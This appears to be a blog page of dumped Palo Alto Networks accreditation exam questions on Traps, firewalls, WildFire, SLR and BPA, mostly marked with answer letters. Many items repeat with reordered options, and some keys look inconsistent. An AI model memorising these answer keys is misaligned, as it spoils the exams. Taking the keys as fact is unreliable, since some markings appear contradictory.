-->

whaust

2019年3月24日 星期日

PSE - Endpoint


<< Don' for get to press the AD ! mant thanks ! >>

 Question 2 of 18.  [F]
True or false? Traps Local Analysis capability is based on a signature database maintained on the endpoint system and regularly updated by WildFire.
True
  False
 
 Mark for follow up


 Question 13 of 18.  [T]
True or false? An executable’s hash verdict from WildFire can be overridden to mark the hash as Malicious or Benign for the local domain.
True
  False
 
 Mark for follow up


 Question 10 of 18.  [F]
True or false? Traps must be sold in conjunction with Palo Alto Networks next-generation firewall products and cannot be sold separately.
True
  False
 
 Mark for follow up

Question 10 of 18.  [A]
How does Traps complement Palo Alto Networks perimeter protection?
  Endpoints sometimes are operated by their users outside the corporate network perimeter.
  Information about threats is uploaded into Traps agents.
  Traps endpoints send signatures about threats directly to Palo Alto Networks firewalls.
  ESM Servers send hashes of files directly to Palo Alto Networks firewalls.
 Mark for follow up


Question 9 of 18.  [A]
Which licenses or subscriptions are required for a Traps deployment?
  one license for all endpoints to be protected (workstations, servers, and VDI)
  separate licenses for workstations, servers, and VDI
  WildFire subscription
  perpetual ESM Server license
 Mark for follow up


Question 8 of 18.  [A]
What is the HTTP address for the Cloud Services Portal?
  https://apps.paloaltonetworks.com
  https://portal.paloaltonetworks.com
  https://csp.paloaltonetworks.com
  https://services.paloaltonetworks.com
 Mark for follow up


Question 6 of 18.  [A]
Which endpoint solution type most accurately describes Traps?
  Prevention Solution
  Detection and Response Solution
  Remediation Solution
  Endpoint Management Solution
 Mark for follow up


Question 5 of 18.  [A]
Which statement is true regarding Traps Execution Restrictions?
  They limit the attack surface of an endpoint by defining where and how users can run executable files.
  They are used to specify which EPMs will be applied to a given process.
  They are used to blacklist or whitelist files for further MPM processing.
  They are included in regular content updates.
 Mark for follow up


Question 18 of 18.  [A]
Which statement is true regarding Traps Management Service Security Event logs?
  Logs are generated by the protection modules when threats occur on endpoints.
  Record status of all log files is collected by the Traps management service.
  Log system events are reported by the Traps agent.
  Record configuration, policy, and system events are reported by the Traps management service.
 Mark for follow up


Question 11 of 18.  [A]
True or false? WildFire detects malware using both static analysis and dynamic analysis mechanisms.
True
  False
 
 Mark for follow up


Question 8 of 18. [A]
Which Palo Alto Networks cloud service is used by the Traps management service?
  Directory Sync Service
  Domain Name Service
  Reporting Service
  Magnifier Service
 Mark for follow up


Question 13 of 18.  [A]
Which statement is true regarding scanning in the Traps Management Service?
  It helps companies obtain regulatory compliance.
  It is a protection and prevention feature.
  It supports macOS endpoints only.
  It is supported by all agent types.
 Mark for follow up


Question 17 of 18.  [AB]
Which two attack vector locations can Traps protect? (Choose two.)
  data center servers
  end-user workstations
  internet perimeter firewall
  branch office firewall
 Mark for follow up


Question 5 of 18.  [A]
True or false? Traps can be positioned as a replacement for traditional antivirus.
True
  False
 
 Mark for follow up


Question 9 of 18.  [AB]
Which two locations can Traps forward logs? (Choose two.)
  syslog server
  Panorama
  next-generation firewall
  FTP server
  SNMP Trap
 Mark for follow up

Question 15 of 18.  [ABC]
Which three file types can be sent by Traps to WildFire for malware analysis? (Choose three.)
  Mach-­O files (Mach­-o) for macOS
  Excel and Word documents containing macros
  any executable file
  Adobe Flash files
 Mark for follow up

Question 17 of 18.  [ABC]
Which three options are Traps differentiators? (Choose three.)
  automatic conversion of threat intelligence into prevention
  multi­-method prevention
  persistent protection
  proactive patching for servers and endpoints
 Mark for follow up

Question 13 of 18.  [A]
Which statement is true regarding Traps process protection?
  Traps protects no processes by default. All processes to be protected must be defined by an administrator.
  Traps protects more than 100 different Windows Processes and more than 50 different Mac processes. Additional processes can be protected based on administrative configuration and settings tuned to the customer’s production environment.
  Traps protects more than 100 different Windows Processes and more than 50 different Mac processes. No additional processes can be protected.
  By default, Traps protects every process running on an endpoint.
 Mark for follow up

Question 6 of 18.  [A]
Which activity should not be highlighted during a Traps demonstration?
  disabling or deleting the Traps agent
  viewing prevention events in the Traps management service web interface
  Traps multi­-method prevention of malware
  exploit technique prevention by Traps EPMs
 Mark for follow up

Question 6 of 18.  [A]
In the Traps management service, which exception type is not valid?
  Administrator Exception
  Support Exception
  Hash Exception
  Process Exception
 Mark for follow up

Question 11 of 18.  [A]
Which statement is true about advanced cyberthreats?
  A zero­-day vulnerability is defined as a security flaw of which the vulnerable product's vendor has no prior awareness.
  A zero-­day vulnerability is defined as a security flaw of which the vulnerable product's customers have no prior awareness.
  Zero-day attacks are unstoppable.
  Protection against zero-day attacks is impractical.
 Mark for follow up

Question 18 of 18.  [A]
When an executable is being evaluated by a Traps malware prevention process, what are restriction rules used for?
  restrict where and how users can run executable files
  restrict the information displayed to users when the Traps agent blocks an exploit
  restrict which processes will be protected by EPMs
  restrict which administrators can set policies
 Mark for follow up

Question 12 of 18. [A]
What does Traps use to stop an exploit technique?
  exploit protection modules (EPMs)
  malware protection modules (MPMs)
  memory corruption
  logic flaws
 Mark for follow up

Question 16 of 18.  [A]
How many exploit techniques must be prevented to stop a successful attack?
  1
  2
  3
  all of the techniques
 Mark for follow up

 Question 4 of 18. [A]
Which statement is true about the malware protection flow?
  A trusted signed file is locally exempt from WildFire analysis and Local Analysis.
  Child process MPM policy is the last step of the malware protection flow.
  Administrative hash control is evaluated after local static analysis.
  Local static analysis occurs before a WildFire verdict check.
 Mark for follow up

 Question 5 of 18.  [A]
Content updates do not include which item?
  new EPMs
  updates to the Local Analysis model
  new trusted publishers
  new default policy rules
 Mark for follow up

Question 4 of 18.  [A]
Which option is not a category of an exploit technique?
  stack canary exploitation techniques, such as CVE­2012­1313
  logic flaw techniques, such as malicious code masquerading as a variable
  memory corruption techniques, such as Heap Spray and ROP Chain
  code execution techniques, such as malicious code embedded in application data files
 Mark for follow up


Question 6 of 18.  [D]
How much logging storage comes with the Traps management service?
  10TB
  100TB
  None. The Logging Service is a paid service.
  100GB
 Mark for follow up

Question 16 of 18.  [A]
Which statement is true about file hashes?
  The Traps agent caches the hashes of executable files for which it has verdicts.
  Each day WildFire automatically updates the ESM Server's cache with hashes of files known from other customers.
  ESM Servers send hashes of PDF files to WildFire.
  ESM Servers send hashes of PDF files and MS Office files to the local cache folder.
 Mark for follow up

Question 17 of 18.  [C]
How often does WildFire send verdict updates to the Traps management service?
  every 5 minutes
  every 24 hours
  every 8 hours
  every 1 hour
 Mark for follow up

 Question 5 of 18.  [A]
When a security event occurs, which Traps component captures forensic information about the event?
  Traps agent
  NGFW Database
  Traps Management Server
  Traps Management Server Console
 Mark for follow up

 Question 11 of 18.  [A]
What does the term "Service Protection" mean?
  The Traps agent is tamper­proof.
  A specified process is protected.
  The process running on a Windows Server system is protected.
  One Traps Management Server can take over for another.
 Mark for follow up



----------------------------------


 Question 7 of 18.
Which two statements describe characteristics of malware executable files? (Choose two.)
  It can take the form of executable code or scripts.
  It is contained in an application data file such as a PDF, JPEG, or HTML file.
  It has malicious intent, acting against the interest of the computer user
  It relies on a legitimate application reading it.
 Mark for follow up

2019年3月23日 星期六

Palo Alto Networks Accredited Systems Engineer (PSE): Platform Associate Accreditation Exam

<< Don' for get to press the AD ! mant thanks ! >>


Question 10 of 30. [A]
Which option describes an advantage of Aperture?
  Aperture provides consistent security across SaaS applications.
  Every application secured provides its own security analysis and management tools.
  The Aperture security rules are imported from any vendor’s firewalls.
  Aperture essentially is a single management point for cloud-native security across multiple cloud service vendors.
 Mark for follow up


 Question 20 of 30. [A]
Click Remote Command Execution in the left navigation panel and scroll down to show the visualization of the alert. We only see a red arrow, indicating that: The above image is from the Magnifier demo script that describes exploring an alert. Which answer best completes the demo script after the words “indicating that”?
  this is the first time this behavior is seen from this user, and the behavior is anomalous.
  83 sessions between 10.10.1.104 and the Private network were blocked.
  no sessions are going the other direction, from the Private network to 10.10.1.104.
  the blue line, representing sessions going the other direction, is hidden by the red line.
 Mark for follow up


 Question 22 of 30. [A]
Which demo of the Palo Alto Networks Security Operating Platform can show a customer how to determine who has access to a certain Box cloud storage file?
  Aperture
  BPA
  NGFW
  Traps
 Mark for follow up

 Question 10 of 30. [A]
What happens when access to an application is allowed in a firewall Security policy, but the allowed application implicitly depends on other parent applications or services that otherwise would not be allowed?
  The firewall automatically allows the dependencies required for the newly allowed application, and the firewall provides a warning that it is doing so.
  The security administrator must specify to the firewall what these dependent applications are.
  The newly allowed application itself is allowed, but because it depends on other applications, it cannot be used until they too are explicitly allowed.
  The firewall does not “allow applications,” but rather enforces security based on traffic independently of which application generates it.
 Mark for follow up


Question 8 of 30. [A]
Palo Alto Networks recommends which approach to cybersecurity?
  Zero trust. All traffic is inspected.
  Always trust, inspect all traffic afterward.
  Trust most things, but don’t trust suspicious traffic.
  Trust everything except recognized threats.
 Mark for follow up


Question 25 of 30. [AB]
Which two Palo Alto Networks security products can prevent successful ransomware attacks? (Choose two.)
  Traps
  NGFW
  Panorama
  SLR
 Mark for follow up


Question 17 of 30. [A]
In the Threat Prevention demo, how is WildFire® used to strengthen the security of the environment?
  When an unknown file is downloaded as a result of a visit to a website, the file is sent to WildFire® for analysis.
  When an Antivirus Profile is attached to a security rule, WildFire® confirms that the viruses blocked by the firewall are still viruses.
  When a file is transferred that contains sensitive data, WildFire® identifies that file as containing sensitive data.
  All traffic going through the firewall is vetted by WildFire®.
 Mark for follow up


Question 21 of 30. [A]
How can a security engineer block all files that contain strings that start with any letters or numbers and contain “pw” or “PW” followed by any numbers?
  Using a pattern definition with regular-expression pattern matching.
  Creating a virus signature to match viruses that steal passwords.
  Treating these filenames as HTTP addresses and using URL filtering.
  Using App-ID to block an identified program that processes files with “PW” or “pw” in them.
 Mark for follow up


Question 25 of 30. [A]
When a file is uploaded for WildFire® analysis, how can its verdict be found?
  Viewing WildFire® submission logs from the firewall’s user interface.
  Examining the security rule that allowed the traffic from the firewall’s user interface.
  Only by accessing the WildFire® user interface.
  The verdict is never seen explicitly, it automatically is incorporated into the firewall’s Security policy.
 Mark for follow up


Question 15 of 30. [A]
Which answer best describes the meaning of the above picture in the context of Palo Alto Networks Security Lifecycle Reviews?
  The firewall in Tap mode connects to a switch and does not impact customer traffic at all.
  The firewall essentially is a router on a stick.
  Firewalls can connect only to customer switches, they cannot connect to customer routers.
  Firewalls involved in Security Lifecycle Reviews use wireless interfaces only.
 Mark for follow up


Question 4 of 30. [A]
Magnifier analyzes logs from:
  Palo Alto Networks Logging Service.
  Panorama distributed log collectors.
  Aperture logs.
  Traps logs.
 Mark for follow up


Question 18 of 30. [A]
When is it helpful to run a Security Lifecycle Review?
  for existing customers as a health check and for potential customers to help build a business case for Palo Alto Networks
  primarily to help Customer Support learn more about support cases
  only for existing customers, to determine features and functions of the security environment that are not fully or properly utilized
  only for potentially new customers, to expose the security weaknesses of their existing security environment
 Mark for follow up


Question 2 of 30. [A]
What is the recommended process of configuring a firewall to ensure that all traffic going through it is logged?
  Override the intrazone-default and interzone-default rules by clicking their Log at Session End boxes.
  Add a rule before the default rules that denies all traffic and logs.
  No process is necessary because the Palo Alto Networks NGFW always logs all traffic.
  Add a rule that allows everything from everywhere as the first rule and logs all traffic that it allows.
 Mark for follow up


Question 3 of 30. [A]
Which option best describes the role of App-ID in Palo Alto Networks NGFW Security policy?
  Application data payload is considered as part of the NGFW security rule matching process.
  The firewall automatically disallows a competitor’s applications for security reasons.
  App-ID is the firewall’s way of identifying which user’s traffic is associated with an application.
  App-ID allows administrators to rename standard applications with internal nicknames.
 Mark for follow up


Question 8 of 30. [A]
What is the Palo Alto Networks NGFW recommended security policy?
  Only traffic that is explicitly allowed passes through the firewall.
  Only traffic that is explicitly denied is prevented from passing through the firewall.
  Only traffic from recognized users is allowed to pass through the firewall.
  Only traffic from unrecognized applications is prevented from passing through the firewall.
 Mark for follow up


Question 15 of 30. [A]
Which Palo Alto Networks Security Operating Platform component is best suited to find and block zero-day threats on an employee’s laptop?
  Traps
  NGFW
  Magnifier
  Aperture
 Mark for follow up

Question 13 of 30. [A]
Which part of the Palo Alto Security Operating Platform uses multiple methods to disrupt an attack before it can infect an endpoint?
  Traps
  Panorama
  Magnifier
  Logging Service
 Mark for follow up

Question 16 of 30. [A]
Which answer best describes User-ID?
  User-ID combines multiple methods to map IP addresses to users, and once users are mapped, they can be used by firewall Security policy rules and reports.
  User-ID is the firewall’s internal storage of encrypted passwords, providing access control to firewall administrative functionality.
  User-ID is another name for App-ID; applications are considered users of the traffic control function of the firewall.
  User-ID is how GlobalProtect knows who can use its service.
 Mark for follow up

Question 19 of 30. [A]
Aperture is a product that addresses which kind of security?
  SaaS
  data center
  endpoint
  inline network
 Mark for follow up


Question 11 of 30. [A]
Which file should be uploaded to the Security Lifecycle Review tool?
  Stats Dump file
  SLR report csv
  Exported config file
  SaaS Risk Assessment Report
 Mark for follow up

Question 17 of 30. [A]
Which part of the Palo Alto Networks Security Operating Platform helps customers accelerate their consumption of innovative cloud security offerings?
  Application Framework
  Generation Alpha Firewall
  Magnifier
  Aperture
 Mark for follow up

Question 2 of 30. [A]
Which option helps to find the security rule that allowed traffic from a particular application at a particular time?
  the log at NGFW Monitor > Traffic
  BPA heatmap
  Aperture SaaS Risk Assessment Report
  WildFire® verdict
 Mark for follow up

Question 13 of 30. [A]
What is the purpose of the “Executive Summary“ section of the SLR?
  highlight key findings of the Security Lifecycle Review
  summarize pricing for addressing issues identified by an SLR
  show the Set Least Resistance properties in one place
  summarize pricing for a large proposal
 Mark for follow up

Question 8 of 30. [A]
Which demo would you present to showcase abnormalities in network traffic?
  Magnifier
  The Best Practices Analysis report
  Traps
  The firewall
 Mark for follow up


Question 2 of 30. [A]
Which answer best describes the sales cycle role that a Security Lifecycle Review (SLR) provides?
  The SLR is a way to use a prospect’s own data to show where the Palo Alto Networks Security Operating Platform can help them.
  Security Lifecycle Reviews can provide automated enforcement for best practices when a single NGFW is left at the customer for six months or more.
  The SLR report is a way to show the kind of reports that can be generated after a customer purchases a comprehensive security platform from Palo Alto Networks.
  Because it takes so much time, an SLR often lengthens the firewall sales cycle.
 Mark for follow up

 Question 20 of 30. [A]
Which tool most directly helps a customer’s engineer to systematically check a previous engineer’s Palo Alto Networks NGFW configuration for general cyber hygiene?
  Best Practices Analysis tool
  NGFW ACC page
  Aperture Explore Assets tool
  Panorama
 Mark for follow up

 Question 25 of 30. [ABC]
Which three components are commonly used to contribute to public cloud security? (Choose three.)
  SaaS security
  endpoint security
  inline security in the cloud
  physical router and switch security
 Mark for follow up

 Question 11 of 30. [A]
Which product can be characterized as an API-based CASB?
  Aperture
  SLR
  Magnifier
  NGFW
 Mark for follow up


********************************************************************************************************************************************************************************************************************************

Question 28 of 30.  [AB]
Which two stages of the cyber-attack lifecycle does App-ID help to directly protect against? (Choose two.)
  Delivery
  Command and Control
  Exploitation
  Installation
  Decryption
 Mark for follow up


Question 7 of 30.  [AB]
App-ID provides value protecting against threats in which two ways? (Choose two.)
  App-ID can be used in a security rule to specify that traffic belonging to a set of applications is blocked.
  App-ID can be used with User-ID and Content-ID to reduce the attack surface.
  With application dependency, the identified application depends on the intent of the attacker and App-ID can be used this way to block malicious intent.
  App-ID can be used in a security rule to specify that traffic initiating from a specific group of users is blocked.
  Once an application is identified, App-ID provides interpretation of the application's payload to ensure that the application is used only as intended.
 Mark for follow up

 Question 9 of 30.  [A]
What does the Logging Service do?
  feeds network Security logs and Endpoint Protection logs into a data lake that is used by applications in the Application Framework
  collects logs from all firewalls in a deployment, reformats them, and provides them to the firewall running the service
  logs and tracks operational errors that occur in any firewalls in a single environment and provides a report of those errors to Panorama
  tracks all firewall uses of logs including log export to syslog, email servers, Panorama, SNMP, and HTTP servers
 Mark for follow up

 Question 15 of 30. [A]
What does a BPA adoption Heatmap show?
  the feature sets of a particular firewall that actually are used
  the distribution of traffic among firewall ports
  the feature sets of a particular firewall that are currently licensed
  the rules of a particular firewall that are hit most often
 Mark for follow up

Question 5 of 30. [A]
What is the correct order of activity to create an SLR report?
  access the Partner Portal, click TRACK DEALS, provide Report Input Filters, upload Stats Dump file
  upload Stats Dump file, click TRACK DEALS, select the Opportunity, provide Account Information, provide Report Input Filters
  upload Stats Dump file, access the Partner Portal, select the Opportunity, provide Report Input Filters
  access the Partner Portal, select Opportunity, click TRACK DEALS, upload Stats Dump file, provide Account Information
 Mark for follow up



 Question 11 of 30.  [A]
Which configuration step is part of setting up the firewall to collect data for an SLR?
  From Network > Interfaces, open an interface and set its Interface Type to Tap.
  From Network > Virtual Routers, add a static route from the interface connected to the switch to the default gateway.
  From Network > Interfaces, add a new SLR interface.
  From Policies > Security, add a security policy that blocks all traffic.
 Mark for follow up


Question 3 of 30.  [A]
To configure a firewall to collect data for an SLR, the interface that is connected to the customer's switch's SPAN port should be which zone type?
  Tap
  Layer3
  Tunnel
  Virtual Wire
  Layer2
 Mark for follow up


Question 29 of 30. [ABC]
Which three security capabilities can be combined to provide necessary protection for current multi-platform cloud application architecture? (Choose three.)
  inline security with the ability to protect and segment traffic that’s entering applications, going between applications, and leaving applications
  use of IaaS and PaaS APIs to obtain good insight into how services are consumed, configured, and deployed
  detection and prevention of zero-day attacks by securing applications and operating systems from within their workload or host
  native cloud-platform security offerings that provide security for multiple platforms and on-premises data center infrastructures
  a set of point products from multiple vendors that provide frictionless security for specific corner use cases, along with a corresponding set of security administration and reporting tools
 Mark for follow up


Question 8 of 30. [A]
Which function or feature describes an advantage of Aperture?
  Aperture provides consistent security across SaaS applications.
  Aperture security rules are imported from any vendor’s firewalls.
  Every application secured provides its own security analysis and management tools.
  Aperture essentially is a single management point for cloud ¬native security across multiple cloud service vendors.
 Mark for follow up


Question 22 of 30. [A]
A BPA Heatmap is filtered by source and destination zone. What does this mean for the Heatmap display?
  Profile adoption will be shown only for rules with that source and destination.
  Traffic shown will be limited to the specified source and destination.
  Security rules in the Heatmap's firewall will be reconfigured to limit traffic to the specified source and destination.
  The virtual router in the Heatmap's firewall will route traffic from the specified source to the specified destination.
 Mark for follow up


Question 7 of 30. [A]
Which file should be uploaded to the Security Lifecycle Review tool?
  Stats Dump file
  SLR report csv
  SaaS Risk Assessment report
  exported config file
 Mark for follow up


 Question 1 of 30.  [A]
Which action or configuration contributes to positive enforcement?
  defining zones according to business needs to access those zones
  configuring a security profile that logs all spyware.
  configuring a rule that allows traffic only for specific applications to reach a zone
  configuring a rule that allows all traffic between zones but logs that traffic
 Mark for follow up


Question 2 of 30.  [A]
How does use of User-ID in a security rule help implement the Palo Alto Networks security posture?
  reduces the attack surface to support Zero Trust
  specifies traffic data pattern matching to support Zero Trust
  increases the attack surface to support positive enforcement
  specifies the exfiltration zones to which security profiles apply
 Mark for follow up


 Question 20 of 30. [A]
Which statement describes the BPA Report password?
  defined at report generation time and is required to view the password-protected report
  allows access to encrypted data stored by the firewall and uploaded to the Support Portal
  the same as the Panorama or firewall admin password and is required to access the report generator
  must be 13 characters long but once entered is never again required
 Mark for follow up


Question 23 of 30. [A]
How are dynamic content updates for the NGFW checked?
  From Device > Dynamic Updates, click Check Now once for Antivirus, then once again for Application, GlobalProtect, Threats, and WildFire® updates.
  Log in to the Partner Portal or Customer Success Portal, and specify the IP address of the firewall to receive dynamic updates.
  From Device > Dynamic Updates, click Check Now once.
  From Device > Dynamic Updates, click Check Now once each for Antivirus, Application, GlobalProtect, Threats, and WildFire® updates.
 Mark for follow up


Question 29 of 30. [A]
Which option describes how samples can be used between the NGFW and WildFire®?
  The firewall sends unknown files to WildFire, which does a threat analysis of the sample and generates new signatures when threats are identified.
  WildFire sends samples of malicious code to the NGFW, which then uses those samples to compare with traffic flowing through it.
  The firewall samples WildFire data every five minutes and adds any threats found to its WildFire Security Profile.
  The firewall sends a configurable distribution of random traffic samples to WildFire, which determines firewall configuration errors based on those samples.
 Mark for follow up


Question 13 of 30. [ABC]
Logs can be used in the Security Operating Platform in which three ways? (Choose three.)
  The Security Lifecycle Review can use logs to discover applications and threats present in an environment.
  Magnifier can use logs to build a baseline of behavior and identify abnormal behavior against that.
  An analyst can view applications with the most sessions and highest risk applications with the most sessions from the Application Command Center.
  The firewall can automatically reconfigure security profiles when there are too many logs for a specific commodity threat.
  The firewall can receive logs from other devices sent through a syslog server and incorporate those logs in its reports.
 Mark for follow up


 Question 4 of 30. [A]
How does Magnifier identify behavioral anomalies?
  comparing new traffic and host profile data to a baseline of normal customer¬-specific activity built by analyzing collected data over 30 days and
  comparing customer traffic behavior to a huge database of that customer’s competitors’ traffic behavior
  comparing customer behavior to known behaviors found in environments with good security hygiene
  comparing customer behavior with a current list of abnormal behavior
  comparing differences among data from Traps, Aperture, the next¬-generation firewall, and GlobalProtect agents
 Mark for follow up


Question 16 of 30. [AB]
When a customer is using competitors’ security products, which two tools are appropriate to help the customer reassess their security posture? (Choose two.)
  SLR
  PPA
  BPA
  TMS
 Mark for follow up


Question 30 of 30. [A]
Which tool most directly helps a customer’s engineer to systematically check a previous engineer’s Palo Alto Networks NGFW configuration for general cyber hygiene?
  Best Practices Analysis tool
  Aperture Explore Assets tool
  Panorama
  NGFW ACC page
 Mark for follow up

Question 22 of 30. [A]
What is the difference between a BPA Report for a registered opportunity and a report without a registered opportunity?
  There is no difference between the two reports.
  Reports for registered opportunities are based on Tech Support Files and reports outside of registered opportunities are based on Prospect Tech Support Files.
  The report for a registered opportunity is free, but there is a fee for generating a report when there is no registered opportunity.
  Reports for registered opportunities include information about licensing entered when the opportunity was registered.
 Mark for follow up


Question 27 of 30.  [A]
To configure a firewall for SLR data collection, how is the data to be logged specified?
  by a Security Policy rule on the firewall
  from Monitor > Manage Custom Reports on the firewall web interface
  with an ACL on the customer switch SPAN port
  from the Partner Portal or Support Portal
 Mark for follow up


Question 18 of 30. [A]
How can User-ID connectivity be verified for an NGFW?
  Check Device > User Identification > User Mapping > Server Monitoring.
  Check the CPU load on the network's domain controller.
  Check traffic load on the network's LDAP server.
  Check WMI logs.
 Mark for follow up


Question 25 of 30. [A]
Which demo would you present to showcase abnormalities in network traffic?
  Magnifier
  Traps
  firewall
  Best Practices Analysis Report
 Mark for follow up

Question 11 of 30. [C]
Which product can be characterized as an API¬based CASB?
  Magnifier
  NGFW
  Aperture
  SLR
 Mark for follow up

 Question 22 of 30. [A]
Which demo of the Palo Alto Networks Security Operating Platform can show a customer how to determine who has access to a certain Box cloud storage file?
  Aperture
  BPA
  NGFW
  Traps
 Mark for follow up


Question 3 of 30.  [B]
Click Remote Command Execution in the left navigation panel and scroll down to show the visualization of the alert. We only see a red arrow, indicating that: The above image is from the Magnifier demo script that describes exploring an alert. Which answer best completes the demo script after the words “indicating that”?
  the blue line, representing sessions going the other direction, is hidden by the red line.
  this is the first time this behavior is seen from this user, and the behavior is anomalous.
  no sessions are going the other direction, from the Private network to 10.10.1.104.
  83 sessions between 10.10.1.104 and the Private network were blocked.
 Mark for follow up

Question 5 of 30. [B]

Which answer best describes the meaning of the above picture in the context of Palo Alto Networks Security Lifecycle Reviews?
  The firewall essentially is a router on a stick.
  The firewall in Tap mode connects to a switch and does not impact customer traffic at all.
  Firewalls can connect only to customer switches, they cannot connect to customer routers.
  Firewalls involved in Security Lifecycle Reviews use wireless interfaces only.
 Mark for follow up

Question 5 of 30.  [A]
When an NGFW is set up to collect data for an SLR, from where on the customer network does data flow to the NGFW?
  from a SPAN port on a customer switch
  from an egress port on a customer switch
  from an ingress port on a customer router
  from the customer's internet service provider link
 Mark for follow up

Question 6 of 30.  [A]
What is the purpose of the “Executive Summary“ section of the SLR?
  highlight key findings
  summarize the BOM for a large proposal
  show the Sensitive Lost Resource properties in one place
  summarize pricing to address issues identified by an SLR
 Mark for follow up

Question 28 of 30.    [A]
Which option best describes the role of App-¬ID in Palo Alto Networks NGFW security policy?
  Application recognition is considered as part of the NGFW security rule matching process.
  App-¬ID allows administrators to rename standard applications with internal nicknames.
  App-¬ID is the firewall’s way of identifying which user’s traffic is associated with an application.
  The firewall automatically disallows a competitor’s applications for security reasons.
 Mark for follow up

Question 29 of 30.    [A]
Which process yields a Tech Support File that is ready for upload?
  Click Device > Support > Generate Tech Support File from the NGFW web interface, then download the file to a computer.
  Download the Tech Support File from the support website, load it into the firewall, and click Device > Support > Generate Tech Support File.
  From Monitor > PDF Reports, select Tech Support File, and specify a location to save the file.
  Click Device > Support > Generate Tech Support File from the NGFW web interface.
 Mark for follow up


 Question 9 of 30. [AB]
What are two ways attackers hide themselves? (Choose two.)
  use permitted applications
  use legitimate credentials
  use of brute force attacks
  use known exploits against known vulnerabilities
 Mark for follow up



 Question 18 of 30. [A]
How is the data in a Stats Dump file made available for SLR Report creation?
  downloaded from the firewall to a computer, then uploaded when requested from the Partner Portal
  fed through the Logging Service and made available to the SLR app
  automatically pulled by Panorama and uploaded to the Partner Portal
  uploaded directly from the firewall to the Partner Portal
 Mark for follow up

 Question 20 of 30. [A]
To configure a firewall to collect data for an SLR, what should the WildFire® action be in the Antivirus Profile attached to the security rule used by the interface receiving customer traffic?
  "alert" for all actions
  "reset client" for all actions
  "alert" for FTP and HTTP, and "reset both" for all other decoders
  "default" for all actions
 Mark for follow up


 Question 25 of 30. [A]
How can an external list of malicious domains be leveraged by an NGFW?
  Content-­ID technology combines results from WildFire® analysis with administrator­-defined policies to inspect and control content traversing the firewall, using data­loss prevention techniques in a single, unified engine.
  An Anti-Spyware Profile can define access to any of the domains on the list to be an application, and the profile can use App-ID to block that application.
  The external list can be specified as a URL in a security rule's zone configuration to block traffic from the zone containing these domains.
  The external list can be specified as an External Dynamic List in an Anti-Spyware Security Profile that need not be attached to a security rule.
 Mark for follow up



 Question 30 of 30. [A]
How do security rules and security profiles work together to create security policy?
  Security profiles specify what happens to traffic that an attached security rule would otherwise allow.
  The firewall forwards traffic when it finds either a security rule or a security profile that allows that traffic.
  Security rules specify what happens to traffic that an attached security profile would otherwise allow.
  Security profiles specify what happens to traffic that an attached security rule blocks.
 Mark for follow up


 Question 3 of 30. [A]
Which product protects against threats moving between servers in the cloud?
  next-generation firewall VM
  Magnifier
  Aperture
  GlobalProtect
 Mark for follow up


Question 24 of 30.  [A]
Which feature or option helps find the security rule that allowed traffic from a particular application at a particular time?
  log at NGFW Monitor > Traffic
  BPA heatmap
  Aperture SaaS Risk Assessment Report
  WildFire® verdict
 Mark for follow up

Question 5 of 30.   [AB]
In addition to reporting deviations from best practice, the BPA Report provides which two pieces of information? (Choose two.)
  a reason to follow best practice for each best-practice fail that the BPA identifies
  a recommendation to achieve a pass for each best-practice fail that the BPA identifies
  a configuration file that when used by the firewall will enable it to pass all best-practice tests
  all the parameters used by any security rules or other rules configured for the firewall
 Mark for follow up


Question 8 of 30.  [A]
Which selections should be used for applications, destinations, and users in the Security policy rule used by a firewall to collect data for an SLR?
  any, any, any
  pre-logon, all-palo-alto-base, trust
  pre-logon, any, trust
  any, any, untrust
 Mark for follow up


 Question 11 of 30.  [A]
Which comparison does a BPA Report present?
  a customer's NGFW configuration against best practices
  signatures in the firewall against signatures available from WildFire®
  a customer's configuration against the results of a customer interview
  customer breaches against those that would be blocked by a properly licensed and configured firewall
 Mark for follow up

 Question 26 of 30.   [A]
To create a BPA report without a registered opportunity, which URL is accessed?
  Customer Success Portal
  NGFW Security Portal
  Partner Portal
  Support Portal
 Mark for follow up

************************************************************************************************

 Question 21 of 30.
When an SLR report from the Partner Portal is created, which four features can be associated with the report? (Choose four.)
  key stakeholders
  geographic location
  deployment location
  end-user account
  deal size
  industry
 Mark for follow up

 Question 20 of 30.
Which answer best describes the sales cycle role that a Security Lifecycle Review provides?
  It is a way to show the kind of reports that can be generated after a customer purchases a comprehensive security platform from Palo Alto Networks.
  It often lengthens the firewall sales cycle because it takes so much time.
  It is a way to use a prospect’s own data to show where the Palo Alto Networks Security Operating Platform can help them.
  It can provide automated enforcement for best practices when a single NGFW is left at the customer for six months or more.
 Mark for follow up

Question 6 of 30.
After a Tech Support File is uploaded to the partner portal to create a BPA report, what does Zone Mapping do?
  When the Tech Support File is from Panorama and reflects multiple firewalls, it allows a user to specify whether each firewall is physical or virtual.
  It allows a user to map each zone in the Tech Support File to its area of architecture, such as internet, DMZ, remote/VPN, or other areas.
  It allows a user to rename zones for clarity in the BPA report.
  It allows a user an additional opportunity to specify source and destination zones for firewall rules analyzed in the BPA.
 Mark for follow up


 Which file should be used to provide data for a BPA or Heatmap?
  SaaS Risk Assessment report
  exported config file
  Tech Support File
  exported Traffic log csv
 Mark for follow up

 Magnifier analyzes logs from which source?
  Panorama distributed log collectors
  syslog servers
  Palo Alto Networks Logging Service
  Aperture logs
 Mark for follow up

Question 2 of 30.
In an attack intended to exfiltrate data, the attack's first landing in the target network is not its target server. Which three steps are likely to be part of the continuation of that attack? (Choose three.)
  obtaining credentials
  accessing sensitive servers
  denial of service
  probing the network
 Mark for follow up

# Palo Alto Networks Accredited Systems Engineer (PSE): Platform Associate Accreditation Exam (Retired)

<< Don' for get to press the AD ! mant thanks ! >>



Question 10 of 30. [A]
Which option describes an advantage of Aperture?
  Aperture provides consistent security across SaaS applications.
  Every application secured provides its own security analysis and management tools.
  The Aperture security rules are imported from any vendor’s firewalls.
  Aperture essentially is a single management point for cloud-native security across multiple cloud service vendors.
 Mark for follow up


 Question 20 of 30. [A]
Click Remote Command Execution in the left navigation panel and scroll down to show the visualization of the alert. We only see a red arrow, indicating that: The above image is from the Magnifier demo script that describes exploring an alert. Which answer best completes the demo script after the words “indicating that”?
  this is the first time this behavior is seen from this user, and the behavior is anomalous.
  83 sessions between 10.10.1.104 and the Private network were blocked.
  no sessions are going the other direction, from the Private network to 10.10.1.104.
  the blue line, representing sessions going the other direction, is hidden by the red line.
 Mark for follow up


 Question 22 of 30. [A]
Which demo of the Palo Alto Networks Security Operating Platform can show a customer how to determine who has access to a certain Box cloud storage file?
  Aperture
  BPA
  NGFW
  Traps
 Mark for follow up

 Question 10 of 30. [A]
